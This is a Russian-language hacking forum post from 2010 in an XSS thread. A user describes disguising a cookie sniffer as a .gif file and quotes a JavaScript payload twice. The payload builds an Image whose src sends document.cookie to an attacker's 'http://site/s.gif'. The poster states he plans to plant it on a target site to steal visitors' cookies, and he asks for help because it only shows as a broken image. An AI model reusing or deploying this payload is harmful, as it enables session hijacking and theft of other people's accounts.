Тема: XSS [Mega Big Bug]
Показать сообщение отдельно

  #57  
Старый 09.08.2010, 01:00
gangsta15
Новичок
Регистрация: 05.08.2010
Сообщений: 10
С нами: 8299766

Репутация: 0
По умолчанию

Цитата:

Сообщение от sulikoshka

Браузер показывает поломанную картинку потому что это текстовый документ

вот как происходит на деле!

ну что же обьясню по порядку
во-первых создаешь просто текстовый документ
2) переимновываешь его в расширение .GIF
пример s.gif ( или какой хочешь )

3) после настраиваешь ксс под твой снифф )))

вот и все

если что то не понятно пиши

смотри) у меня есть сниффер замаскированный под картинку
s.gif

Цитата:






так же тот файл (которое мазахакер описывал) со следующим содержанием
img.gif

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




Так вот последний я хочу вставить на какой нибудь нужный мне сайт где изображения не обрабатываются ([img][/img]) и чтобы как описывал мазахакер, когда оно подгружаться будет - в нем будет выполняться тот код

Цитата:



img = new Image();
img.src = "http://site/s.gif?"+document.cookie;




И так на мой сниффер (s.gif) будут приходить куки, но когда я вставляю этот файл (img.gif) он отображается "поломанной картинкой" т.е. ничего не подгружается и куков он не посылает =)

P.S. Наверное запутал) Я вообще правильно понял тот способ что описывал мазахакер? (последний "абзац" в первом посте)
 
Ответить с цитированием